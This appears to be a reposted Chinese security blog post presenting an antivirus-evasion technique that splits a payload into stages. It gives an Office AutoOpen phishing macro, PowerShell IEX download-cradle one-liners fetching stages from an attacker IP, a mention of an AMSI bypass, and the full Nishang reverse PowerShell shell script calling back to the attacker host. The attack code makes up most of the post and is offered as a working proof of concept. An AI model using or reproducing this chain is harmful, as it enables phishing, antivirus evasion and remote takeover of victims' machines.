卡巴defender火绒360免杀十种方法8: 化整为零
2023-5-22 08:35:53 Author: 奶牛安全(查看原文) 阅读量:31 收藏

环境

  • 带有 Ubuntu Linux AMI 的 AWS EC2 作为攻击者 C2 服务器。
  • 带有 Windows Server 2019 AMI 的 AWS EC2 作为受害者机器。
  • 安装 Visual Studio 2022 社区的本地 Windows 10 计算机用于恶意软件开发和编译
  • 本地 Kali Linux 攻击机。

过程

无论如何将有效载荷化整为零分成不同执行阶段都不是新技术,威胁参与者通常使用它来传播可以绕过初始静态分析的恶意软件。这是因为真正的恶意负载将在稍后阶段解码和执行,静态分析可能没有机会发挥作用。

对于此 PoC,将展示一种非常简单但有效的方法来分解反向 shell 负载,例如,可用于使用以下宏创建恶意 Office 文件:

执行第一阶段的宏

Sub AutoOpen()
Set shell_object = CreateObject("WScript.Shell")
shell_object.Exec ("powershell -c IEX(New-Object Net.WebClient).downloadString('http://IP:PORT/stage1.ps1')")
End Sub

当然,这不会被 AV 静态检测到,因为它只是在执行一个看似良性的命令。

由于实验机器没有安装 Office,将通过在 PowerShell 脚本中手动执行上述命令来模拟网络钓鱼过程。

最后,本节的PoC如下:

  • stage0.txt(这将是在网络钓鱼宏中执行的命令)
IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/stage1.txt")
  • stage1.txt
IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/ref.txt")
IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/stage2.txt")
  • stage2.txt
function Invoke-PowerShellTcp 
{
<#
.SYNOPSIS
Nishang script which can be used for Reverse or Bind interactive PowerShell from a target.

.DESCRIPTION
This script is able to connect to a standard netcat listening on a port when using the -Reverse switch.
Also, a standard netcat can connect to this script Bind to a specific port.

The script is derived from Powerfun written by Ben Turner & Dave Hardy

.PARAMETER IPAddress
The IP address to connect to when using the -Reverse switch.

.PARAMETER Port
The port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on
the given IP and port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Bind -Port 4444

Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port.

.EXAMPLE
PS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444

Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must be
listening on the given IP and port.

.LINK
http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
https://github.com/nettitude/powershell/blob/master/powerfun.ps1
https://github.com/samratashok/nishang
#>
[CmdletBinding(DefaultParameterSetName="reverse")] Param(

[Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]
[String]
$IPAddress,

[Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]
[Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]
[Int]
$Port,

[Parameter(ParameterSetName="reverse")]
[Switch]
$Reverse,

[Parameter(ParameterSetName="bind")]
[Switch]
$Bind

)

try
{
#Connect back if the reverse switch is used.
if ($Reverse)
{
$client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)
}

#Bind to the provided port if Bind switch is used.
if ($Bind)
{
$listener = [System.Net.Sockets.TcpListener]$Port
$listener.start()
$client = $listener.AcceptTcpClient()
}

$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}

#Send back current username and computername
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
$stream.Write($sendbytes,0,$sendbytes.Length)

#Show an interactive PowerShell prompt
$sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')
$stream.Write($sendbytes,0,$sendbytes.Length)

while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
try
{
#Execute the command on the target.
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
}
catch
{
Write-Warning "Something went wrong with execution of command on the target."
Write-Error $_
}
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x

#Return the results
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
if ($listener)
{
$listener.Stop()
}
}
catch
{
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}

Invoke-PowerShellTcp -Reverse -IPAddress 172.31.17.142 -Port 80

这里有几件事要注意。首先,ref.txt 是一个简单的 PowerShell AMSI 绕过,它允许当前的 PowerShell 进程修补内存中 AMSI 扫描。此外,在这种情况下,PowerShell 脚本的扩展名无关紧要,因为它们的内容将作为文本简单地下载并使用 Invoke-Expression(IEX 的别名)调用。

然后可以执行完整的 PoC,如下所示:

  • 在受害机器中执行阶段 0
  • 受害机器从 C2 下载阶段
  • 在攻击者服务器中获取反向 shell

文章来源: http://mp.weixin.qq.com/s?__biz=MzU4NjY0NTExNA==&mid=2247489466&idx=1&sn=fe729324d7652f23abe59c8bb2d703d9&chksm=fdf97cafca8ef5b9b4344d835d8d827fe21665e95b070c2548e89cae3019363111a728a60881#rd
如有侵权请联系:admin#unsafe.sh